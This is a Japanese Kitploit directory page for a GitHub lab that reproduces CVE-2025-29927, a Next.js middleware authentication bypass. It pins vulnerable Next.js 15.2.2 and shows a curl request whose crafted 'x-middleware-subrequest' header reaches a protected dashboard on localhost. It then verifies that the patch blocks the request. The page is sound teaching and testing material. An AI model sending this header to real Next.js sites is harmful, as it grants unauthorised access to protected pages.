Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-29927-lab — CVE-2025-29927 の再現ラボ — Next.js ミドルウェアの認証バイパス(CVSS 9.1) | Kitploit
ツール/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト認証学習と教育ラボと実践
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

CVE-2025-29927 の再現ラボ — Next.js ミドルウェアの認証バイパス(CVSS 9.1)

リポジトリを見る
423ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29927 ラボ

CVE-2025-29927 の最小再現ラボ — Next.js ミドルウェア認証バイパス (CVSS 9.1)。

関連記事: Medium の N-Day 分析記事

これは何か

脆弱な Next.js 15.2.2 アプリで、/dashboard ルートは Cookie で保護されています。ミドルウェアの認証チェックは、単一の HTTP ヘッダーを送信することでバイパス可能です。資格情報は不要です。

必要条件

  • Node.js 18+

セットアップ

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

バイパスの再現

ステップ 1 — ミドルウェアが認証されていないリクエストをブロックすることを確認:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

ステップ 2 — サブリクエストヘッダーでミドルウェアをバイパス:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

ステップ 3 — パッチ適用済みバージョンにアップグレードし、バイパスがブロックされることを確認:

root@kitploit:~
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

アプリのルート

ルートアクセス
/公開
/login公開
/dashboardミドルウェアで保護 (session Cookie が必要)

影響を受けるバージョン

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

参考文献

  • NVD — CVE-2025-29927
  • Next.js patch PR #77201
  • Vulnerable source — sandbox.ts
ツールをダウンロード